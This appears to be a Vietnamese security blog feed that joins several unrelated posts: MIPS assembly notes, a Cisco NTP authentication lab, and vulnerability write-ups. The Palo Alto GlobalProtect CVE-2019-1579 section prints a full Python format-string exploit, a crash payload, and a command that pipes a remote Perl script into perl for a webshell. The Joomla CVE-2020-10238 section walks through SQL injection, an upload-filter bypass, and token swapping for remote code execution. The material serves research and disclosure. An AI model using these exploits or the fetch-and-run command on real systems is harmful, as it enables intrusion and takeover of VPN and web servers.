Người đi rồi… áo mùa thu khép lại

Giấu trong tà một chút nắng vàng hanh

Buồn của tôi thay lá mọc trên cành

Chưa rụng vội để chờ mùa thu khác

Xin chào mọi người lại là mình đây, một dân nghiệp dư mới vào nghề. Dạo này do làm dự án công ty bận bịu quá chẳng có thời gian mà tìm hiểu và viết blog nữa ☹. Nay nhân một ngày thảnh thơi như cái tình trạng FA vào mùa đông của mình ,đành dành một chút thời gian để viết tiếp cái Seri dài tập chưa có hồi kết này để các bạn đọc tiếp ?).

Các lệnh tính toán số học.

Lệnh cộng.

Theo như mình biết thì gồm:

Cú pháp:

Đối với add,addu: <tên lệnh > <thanh ghi đích> , <thanh ghi 1>, < thanh ghi 2>

Đối với addi,addiu: <tên lệnh > <thanh ghi đích> , <thanh ghi 1> , < hằng số>

Ví dụ cụ thể:

Biên dịch file .c trên với kiến trúc MIPS như sau:

mips-linux-gnu-gcc -O3 -S -mfp32 -march=mips32 Sum.c

Hình ảnh khi được biên dịch ra MIPS Assembly.

Tại sao mình khai báo signed int nhưng khi biến dịch ra assembly lại nó lại dùng addiu. Thì theo như mình lướt dạo trên mạng thấy phần lớn trình trình biên dịch sẽ sử dụng addu và addiu để tránh “bẫy” tràn. Và add,addi chỉ sử dụng khi tự code hoặc được sử dụng trong ISAs như x86,ARM…

Lệnh trừ.

Cú pháp:

sub,subu: <tên lệnh > <thanh ghi đích> , <thanh ghi 1>, < thanh ghi 2>

Ví dụ cụ thể:

Hình ảnh khi được biên dịch ra MIPS Assembly.

Lệnh nhân

Ví dụ cụ thể:

Lệnh chia.

Thôi đoạn này mình lười lắm không chụp ảnh đâu ?). Cái này cũng tương tự như các hình trên thôi.

Lệnh tính toán Logic.

Ví dụ cụ thể.

Hình ảnh khi được biên dịch ra mã Asembly

Kết thúc phần 2 cho mùa đông lạnh lẽo ở đây thôi. Hẹn các bạn những phần tiếp theo nhé ^^.

Vu Van Tien ( aka n0_be3r )

Lời đầu tiên cho mình xin gửi lời chào tới toàn thể các bạn/anh/chị/em trong lĩnh vực Network Security. Ý tưởng chính của series này nhằm cung cấp những kiến thức cơ bản nhất cho những ai muốn tìm tìm hiểu về “networking security” .

Trong bài viết này, mình sẽ giới thiệu một số dịch vụ triển khai dựa trên cở sở hạng tầng mạng của thiết bị Cisco, nhằm giúp cho người quan trị làm chủ hệ thống mạng như bảo mật, kiểm soát và xử lý sự cố được tốt hơn

Hiện nay, vấn đề bảo mật mạng là một vấn đề rất nan giải cho các công ty, cơ quan nhà nước, trường học và cả những người quản trị mạng…và làm sao để có thể xây dựng một hệ thống mạng an toàn ? Series này mình sẽ đề cập đến việc để thiết lập, cấu hình các giao thức syslog, NTP và SSH dưới góc độ “security“. Ở trong phần này mình sẽ nói về giao thức NTP và cách cấu hình an toàn với NTP trong một hệ thống mạng.

NTP là gì ?

NTP – Network Time Protocol là một giao thức để đồng bộ đồng hồ của các hệ thống máy tính thông qua mạng dữ liệu chuyển mạch gói với độ trễ biến đổi và nó hoạt động trên port 123/UDP.

Một câu hỏi được đặt ra là máy chủ NTP này nó lấy thời gian chuẩn ở đâu ?

Một nguồn thời gian chuẩn ở đây được gọi là đồng hồ nguyên tử (atomic clock) , nghe có vẻ nguy hiểm nhưng thực chất cơ chế của nó là điều chỉnh thời gian theo giao động của nguyên tử, tần số giao động của nguyên tử nó sẽ không đổi và có thể đo được, dựa vào tất cả các yếu tố đó người ta khẳng định đồng hồ nguyên tử là loại chính xác nhất hiện tại mà dựa vào cái đồng hồ này mà toàn bộ thiết bị trên thế giới sẽ theo quy chuẩn này.

Một câu hỏi nữa được đặt ra là thu thập nó theo cách nào ?

• Thứ nhất là kết nối trực tiếp với đồng hồ nguyên tử hay từ các máy chủ khác có sử dụng NTP
• Thứ 2 thông qua hệ thống GPS, các hệ thống định vị toàn cầu này sẽ lấy các tín hiệu từ những trạm đồng hồ nguyên tử đó và chuyển các tín hiệu đó cho các thiết bị thu đầu cuối, như điện thoại hoặc các thiết bị có khả năng thu sóng vệ tinh
• Thứ 3 thông qua tín hiệu sóng radio

Các tín hiệu thời gian được sử dụng bởi hầu hết các máy chủ NTP là nguồn thời gian UTC (Coordinated Universal Time). UTC nó là thời gian toàn cầu dựa trên thời gian của đồng hồ nguyên tử và là một tiêu chuẩn được dùng để thiết lập tất cả các múi giờ trên thế giới. UTC gồm 2 phần chính là TAI, UT1

• TAI (International Atomic Time): giờ nguyên tử quốc tế, đây là thang đo thời gian của hơn 400 đồng hồ nguyên tử trên thế giới, cung cấp độ chính xác cho đồng hồ của chúng ta
• UT1 (Universal Time): Giờ thiên văn nó đề cập đến chuyển động quay của trái đất. Nó được sử dụng để so sánh tốc độ do TAI cung cấp với độ dài thực tế của một ngày trên Trái đất.

Dựa vào 2 yếu tố này nó tạo ra giờ UTC là giờ chuẩn nhất hiện nay

Tóm gọn lại, nói một cách đơn giản, máy chủ NTP tức là nó chạy một cái đồng hồ và đồng hồ này sẽ cung cấp thông tin về thời gian chuẩn cho các thiết bị mạng

Vấn đề bảo mật trong NTP

Tại sao phải sử dụng NTP, nếu ta sử dụng đồng hồ cục bộ trên các thiết bị thì vấn đề có thể xảy ra là các đồng hồ này có thể không chính xác hoặc không đồng bộ với nhau chính vì vậy mà các bản tin nhật ký mà các thiết bị này gửi về máy chủ log có thể là không chính xác nữa cho nên là sẽ khó khăn cho việc khi chúng ta muốn kiểm tra nhật ký xem là một cái sự kiện A diễn ra trong mạng tại thời điểm nào, nếu thời gian không chính xác thì rõ ràng việc điều tra về sự cố an ninh mạng nó không còn chính xác nữa cũng như là khó khăn trong việc xác định thời điểm.

Chính vì thế nếu ta chạy 1 cái đồng hồ đồng bộ cho toàn thiết bị mạng, lúc này ta chỉ cần cấu hình chính xác thời gian trên máy chủ này chính xác là được khi đó các thiết bị mạng sẽ đồng bộ theo đồng hồ ở trên máy chủ NTP này. Điều này rất là hữu ích, nó thể hiện khả năng quản lí tập trung đối với vấn đề về thời gian của các thiết bị mạng

Liệu vậy đã đủ ?

Lúc này kẻ tấn công nghĩ ra 1 thủ đoạn đó là gửi các cái bản tin thời gian giả mạo tới các thiết bị mạng này, khiến các thiết bị hoạt động sai lệch về mặt thời gian và gây khó khăn cho người quản trị mạng khi kiểm tra log, ngoài ra việc sai lệch thời gian còn làm cho các chứng chỉ số sẽ hoạt động không còn chính xác nữa vì vậy đây có thể là một trong những nguyên nhân gây ra gây ra các cuộc tấn công từ chối dịch vụ (DoS, DDoS) trên hệ thống của bạn, do đó cần phải xác thực các bản tin được trao đổi giữa NTP Server và các thiết bị mạng. Từ đó người ta nghĩ ra việc xác thực giữa máy chủ NTP và các thiết bị.

Lab

Để hiểu rõ hơn vấn đề, mình sẽ minh họa rõ hơn trong bài lab bằng thiết bị Router Cisco

Sơ đồ ví dụ

Bước 1: Cấu hình ban đầu

• Thực hiện đặt ip trên các interace của các router như trên hình
• Cấu hình định tuyến bất kỳ đảm bảo các mạng thông nhau

Bước 2: Cấu hình NTP & Xác thực

• Cấu hình R1 đóng vai trò là nguồn đồng bộ thời gian thực cho hệ thống mạng
• Cấu hình xác thực các gói tin NTP đến từ R1 của các router R2, R3, R4

Trên R1 (NTP master):

Setup thời gian chuẩn

R1(config)#clock timezone GMT +7 // múi giờ VN là GMT +7

R1(config)#ntp master 6

Xác định nguồn NTP, có thể là NTP server public, NTP từ mạng nội bộ, internal clock, trong bài lab này mình sẽ sử dụng internal clock của chính router này

R1(config)#ntp source loopback 0

R1(config)#ntp authenticate

R1(config)#ntp authentication-key 12 md5 ntppass12

R1(config)#ntp authentication-key 13 md5 ntppass13

R1(config)#ntp authentication-key 14 md5 ntppass14

R1(config)#ntp trusted-key 12

R1(config)#ntp trusted-key 13

R1(config)#ntp trusted-key 14

Trên R2 (NTP client):

R2(config)#ntp server 172.16.10.1 key 12

R2(config)#ntp authenticate

R2(config)#ntp authentication-key 12 md5 ntppass12

R2(config)#ntp trusted-key 12

Trên R3 (NTP client):

R3(config)#ntp server 172.16.10.1 key 13

R3(config)#ntp authenticate

R3(config)#ntp authentication-key 13 md5 ntppass13

R3(config)#ntp trusted-key 13

Trên R4 (NTP client):

R4(config)#ntp server 172.16.10.1 key 14

R4(config)#ntp authenticate

R4(config)#ntp authentication-key 14 md5 ntppass14

R4(config)#ntp trusted-key 14

Lưu ý: phải mất một khoảng thời gian việc đồng bộ mới diễn ra

Kiểm tra

R2#show ntp status

Clock is synchronized, stratum 7, reference is 172.16.1.1

nominal freq is 250.0000 Hz, actual freq is 250.0001 Hz, precision is 2**10

ntp uptime is 216200 (1/100 of seconds), resolution is 4000

reference time is E3057EDD.845A1E18 (11:43:09.517 GMT Fri Sep 11 2020)

clock offset is 0.0000 msec, root delay is 0.00 msec

root dispersion is 9.06 msec, peer dispersion is 5.19 msec

loopfilter state is ‘CTRL’ (Normal Controlled Loop), drift is -0.000000539 s/s

system poll interval is 64, last update was 161 sec ago.

R3#show ntp status

Clock is synchronized, stratum 7, reference is 172.16.1.1

nominal freq is 250.0000 Hz, actual freq is 250.0001 Hz, precision is 2**10

ntp uptime is 216200 (1/100 of seconds), resolution is 4000

reference time is E3057EDD.845A1E18 (11:46:02.567 GMT Fri Sep 11 2020)

clock offset is 0.0000 msec, root delay is 0.00 msec

root dispersion is 10.84 msec, peer dispersion is 5.86 msec

loopfilter state is ‘CTRL’ (Normal Controlled Loop), drift is -0.000000539 s/s

system poll interval is 64, last update was 518 sec ago.

R4#show ntp status

Clock is synchronized, stratum 7, reference is 172.16.1.1

nominal freq is 250.0000 Hz, actual freq is 250.0001 Hz, precision is 2**10

ntp uptime is 216200 (1/100 of seconds), resolution is 4000

reference time is E3057EDD.845A1E18 (11:51:02.767 GMT Fri Sep 11 2020)

clock offset is 0.0000 msec, root delay is 0.00 msec

root dispersion is 13.20msec, peer dispersion is 4.36 msec

loopfilter state is ‘CTRL’ (Normal Controlled Loop), drift is -0.000000539 s/s

system poll interval is 64, last update was 961.89 sec ago.

Kết quả show cho thấy R2, R3 và R4 đã đồng bộ thông tin thời gian thực với R1. Việc đồng bộ thành công cho thấy xác thực NTP đã diễn ra thành công.

Chúc các bạn thành công và hẹn mọi người vào blog tiếp theo về cấu hình an toàn trên server lưu log và SSH

References:

https://blog.apnic.net/2019/11/08/network-time-security-new-ntp-authentication-mechanism/

http://nelsonherron.tripod.com/itdir/cisco/ntp/ntp.htm

SSL VPN bảo vệ mạng nội bộ khỏi những cuộc tấn công trên Internet, nhưng điều gì xảy ra khi chính những dịch vụ SSL VPN lại chứa lỗ hổng bảo mật? Chúng có thể được truy cập qua Internet, là con đường được tin cậy dẫn tới mạng nội bộ của bạn. Khi một máy chủ SSL VPN bị chiếm quyền điều khiển, kẻ tấn công có thể xâm nhập vào mạng Intranet, thậm chí chiếm đoạt tất cả người dùng nết nối với máy chủ SSL VPN đó. Do tầm quan trọng của chúng, giờ đây càng ngày càng có nhiều nghiên cứu về bảo mật về các dịch vụ SSL VPN hiện có, trong đó Palo Alto là nhà cung cấp tôi chú ý nhất.

Vì sao lại là Palo Alto? Palo Alto với GlobalProtect là dịch vụ được khá nhiều các ngân hàng tại Việt Nam sử dụng. Vì vậy, việc tìm hiểu, nghiên cứu về những lỗ hổng của Palo Alto có thể giúp tôi cũng như VSEC thuận lợi trong quá trình kiểm thử bảo mật với những khách hàng là ngân hàng, tài chính.

Về lỗ hổng

Lỗ hổng mình nghiên cứu hôm nay là CVE-2019-1579, được tìm ra bởi Orange Tsai(@orange_8361) và Meh Chang(@mehqq_), là một lỗ hổng PreAuth RCE với thang điểm cve score là.

Một lỗ hổng format string đơn giản mà không cần xác thực. Sslmgr là cổng SSL xử lý các SSL handshake giữa máy chủ và máy khách. Daemon này có thể truy cập thông qua đường dẫn /sslmgr.

$ curl https://global-protect/sslmgr

<?xml version=”1.0″ encoding=”UTF-8″ ?>

<clientcert-response>

<status>error</status>

<msg>Invalid parameters</msg>

</clientcert-response>

Trong quá trình trích xuất tham số, daemon sẽ tìm kiếm chuỗi tên scep-profile-name và chuyển giá trị của nó dưới dạng định dạng snprintf để điền vào bộ đệm. Điều đó dẫn đến format string attack. Có thể làm crash dịch vụ với %n

POST /sslmgr HTTP/1.1

Host: global-protect

Content-Length: 36

scep-profile-name=%n%n%n%n%n…

Các phiên bản bị ảnh hưởng

Tất cả phiên bản GlobalProtect trước tháng bảy 2018 đều bị ảnh hưởng bởi lỗ hổng này! Danh sách các phiên bản bị ảnh hưởng:

• Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
• Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
• Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

Các phiên bản 7.0.x và 9.x không bị ảnh hưởng bởi lỗ hổng này.

Thực hiện tấn công

Dưới đây là payload PoC của Orange Tsai và Meh Chang của lỗ hổng này:

#!/usr/bin/python

import requests

from pwn import *

url = “https://sslvpn/sslmgr”

cmd = “echo pwned > /var/appweb/sslvpndocs/hacked.txt”

strlen_GOT = 0x667788 # change me

system_plt = 0x445566 # change me

fmt = ‘%70$n’

fmt += ‘%’ + str((system_plt>>16)&0xff) + ‘c’

fmt += ‘%32$hn’

fmt += ‘%’ + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + ‘c’

fmt += ‘%24$hn’

for i in range(40,60):

fmt += ‘%’+str(i)+’$p’

data = “scep-profile-name=”

data += p32(strlen_GOT)[:-1]

data += “&appauthcookie=”

data += p32(strlen_GOT+2)[:-1]

data += “&host-id=”

data += p32(strlen_GOT+4)[:-1]

data += “&user-email=”

data += fmt

data += “&appauthcookie=”

data += cmd

r = requests.post(url, data=data)

Khi chạy thành công, sslmgr sẽ trở thành webshell với scep-profile-name là biến để inject command.

$ curl -d ‘scep-profile-name=curl orange.tw/bc.pl | perl -‘ https://global-protect/sslmgr

Case study

Một trong những case study lớn nhất của Orange là Uber, qua nghiên cứu, Orange Tsai phát hiện Uber có khoảng 22 máy chủ sử dụng GlobalProtect trên thế giới. Qua kiểm tra một máy chủ của họ, Orange tim được phiên bản sử dụng là 8.x, một phiên bản chứa lỗ hổng này. Và đây là PoC:

Reference: https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html

Mô tả ngắn gọn về CVE mình tìm được:

1. CVE-2020-10238: Incorrect Access Control in com_templates (Bài mình nói về cái này) CVSS 2.0:5.0 và CVSS 3.x :7.5
2. CVE-2020-10239: Incorrect Access Control in com_fields SQL field CVSS 2.0:6.5 và CVSS 3.x :8.8
3. CVE-2020-10241: CSRF in com_templates image actions CVSS 2.0:6.8 và CVSS 3.x :8.8
4. Và còn … cái nữa nhưng họ đang thảo luận sửa lỗi sao cho đúng nên họ hẹn bản cập nhật sau. Đồng nghĩa là mình chưa thể public cách khai thác được :))

—————————————————————————————————————————————–

Ban đầu thì mình được tham gia vào dự án của công ty để thực hiện quá trình pentest cho ứng dụng website. Thì tại website đó có sử dụng CMS là Joomla.

Trước khi đi vào chi tiết thì mình muốn làm rõ một vài khái niệm như:

1. CVE là gì?

CVE (Common Vulnerabilities and Exposures) là 1 chương trình được khởi xướng vào năm 1999 bởi MITRE. Mục đích của chương trình này là phân loại và nhận dạng những lỗ hổng về phần cứng hoặc phần mềm, tập hợp thành 1 hệ thống mở để chuẩn hóa qui trình xác thực các lỗ hổng đã được biết. Những lỗ hổng này có thể dẫn đến các vụ tấn công an ninh mạng dưới các hình thức như chiếm quyền điều khiển hệ thống mục tiêu, đọc các dữ liệu quan trọng của người dùng như địa chỉ, số điện thoại, mã thẻ ngân hàng.

Như vậy, có thể coi CVE như 1 cơ sở dữ liệu về các lỗ hổng bảo mật, tạo thuận lợi cho việc đối chiếu thông tin giữa các công cụ và dịch vụ bảo mật khác nhau. Danh sách CVE chứa số ID, thông báo trạng thái, mô tả ngắn gọn và tài liệu tham khảo liên quan đến lỗ hổng bảo mật. Bằng việc tham chiếu CVE ID của 1 lỗ hổng nhất định, các tổ chức có thể thu thập thông tin nhanh gọn và chính xác từ nhiều nguồn tin khác nhau.

2. CMS là gì?

CMS là chữ viết tắt của Content Management System, hay còn gọi là hệ thống quản trị nội dung nhằm mục đích giúp dễ dàng quản lý, chỉnh sửa nội dung. Nội dung ở đây có thể là tin tức điện tử, báo chí hay các media hình ảnh, video, và nhiều loại tư liệu khác.

Hệ thống CMS giúp tiết kiệm thời gian quản lý, chi phí vận hành và bảo trì nên hiện nay có rất nhiều công ty sử dụng. Không chỉ là công ty mà hiện nay các blog cá nhân cũng ra đời với số lượng không hề nhỏ, và họ chọn giải pháp sử dụng CMS nhằm dễ dàng xây dựng website và quản lý nội dung, bên cạnh đó còn tiết kiệm được chi phí xây dựng website.

Và trong số đó thì có Joomla, chỉ đứng sau WordPress về mức độ phổ biến.

Thời điểm đầu

Và khi thực hiện pentest trên website đó, họ sử dụng Joomla version 1.5. Thoạt đầu thì có thể sẽ có rất nhiều CVE đã được công khai nhưng không thể khai thác. Mình quyết định duyệt quét các thành phần của Joomla. Thì website có sử dụng thành phần AllVideos Reloaded chứa lỗi SQL injection(Mình đã phải thử tay mới ra được, vì sử dụng tool đều trả về thành công trong khi thực tế là không tìm thấy, tốn rất nhiều thời gian). Chuyện gì đến cũng đến, từ SQLi có thể thu được username và password nhưng password lại được hash(MD5).salt .May mắn là có thể bruteforce được.

Khá hài là tìm được bản hash với quyền user manager và super-admin. Trong đó, quyền manager thì bạn chỉ có thể viết bài. Khi giải mã được thì tài khoản super-admin cần tiền bằng bitcoin để trả. Vì tiết kiệm tiền nên mình đã quyết định bypass bằng cách upload shell.

Như các bạn đã biết hoặc có thể chưa biết, việc bypass để upload shell của CMS là điều rất khó. Nhưng mình quyết định bypass. Bằng cách sử dụng các thủ thuật search google cũng không hiệu quả, mình chợt nghĩ thêm dấu “.” sau file để xem phản ứng là sao. Ồ, đã bypass và thực thi mã lệnh từ xa.

Thời điểm tìm kiếm

Từ đây, đã nung nấu trong lòng là tìm CVE. Khi tìm đến phiên bản mới mới thì mới phát hiện là đã có người tìm ra rồi, được 6.8 điểm. Khá tiếc.

Rồi, ra Tết Nguyên Đán thì phải đi làm. Ngay ngày đầu tiền của năm mình đã tìm cách bypass trên phiên bản mới nhất nhưng bất thành. Mình đã chuyển sang hướng khác là tìm cách xem họ có kiểm soát sai cách không? Tức là thực hiện quyền khi không được phép do ứng dụng không kiểm tra hoặc kiểm tra sai.

Trong chính sách phân quyền của Joomla, có 3 tài khoản là manger,admin và superadmin. Nếu bạn là superadmin thì bạn có thể làm mọi thứ. Nhưng khi phân quyền, rõ ràng là admin có quyền thấp hơn là không thể thực thi mã bằng cách gì đó.

Mình quyết định đi từ quyền admin vì rõ ràng quyền manager sẽ không hiệu quả. Bắt tay vào làm thì có một thành phần tên com_template cho phép người dùng có thể thêm/xóa/sửa code của template trực tiếp từ giao diện website như hình ảnh minh họa:

Giao diện template của super-admin

Phiên bản bị ảnh hưởng là nhỏ hơn hoặc bằng 3.9.15.

Link truy cập nhanh :

yourdomain/administrator/index.php?option=com_templates&view=template&id=506&file=aG9tZQ==

Giao diện cho biết người đó là superadmin.

Mình tiến hành đăng nhập với quyền admin thì như sau:

Rõ ràng là khác nhau đã xảy ra.

Ý tưởng như sau: Sẽ sử dụng quyền admin để chỉnh sửa file index.php để thực thi mã lệnh từ xa(RCE).

Mình quyết định bắt request chỉnh sửa file index.php ở trên của quyền superadmin như sau:

Thêm vào file index.php code php thực thi mã như sau:

Thêm code để RCE

Tiến hành lưu lại và dùng Burpsuite để bắt request này:

Để dễ nhìn thì mình xóa hết file và chỉ để mã code như trên cho dễ nhìn:

Token của super-admin

Phần bôi vàng là token của superadmin. Joomla sử dụng token để loại bỏ lỗi CSRF. Không sao, ở đây là quyền admin.

Giữ lại request này. Và đăng nhập bằng quyền admin.

Để lấy token của admin thì mình làm như hình:

Chọn Edit và dùng Burpsuite để bắt request này:

Tìm token của admin

Phần bôi vàng chính là token của admin.

Bây giờ thực hiện thay token của admin cho superadmin và sửa phần URI như sau:

Request để RCE

Chuyển tiếp và kết quả:

Lưu thành công

Vậy là đã chèn mã thực thi, tự hỏi shell ở đâu?

Đơn giản, bạn chỉ cần về homepage như sau để thực thi mã:

RCE

Khi tìm được thì mình đã gửi mail cho Joomla theo hướng dẫn trên trang chủ của họ và kết quả sau cuối:

Mail gán CVE của Joomla

Để cho tự động hơn, mình viết tool để khai thác lỗi này cách sử dụng như sau:

Khai thác bằng tool

Video thực hiện:

https://vimeo.com/396947804

Mã nguồn cho lỗi này có tại:

https://github.com/HoangKien1020/Joomla-CVE/tree/master/CVE-2020-10238

CVE được gán:

https://developer.joomla.org/security-centre/804-20200303-core-incorrect-access-control-in-com-templates.html

Nguồn tham khảo cho các khái niệm:

1. https://cystack.net/vi/resource/zero-day-la-gi-cve-la-gi/
2. https://freetuts.net/cms-la-gi-cac-cms-pho-bien-hien-nay-342.html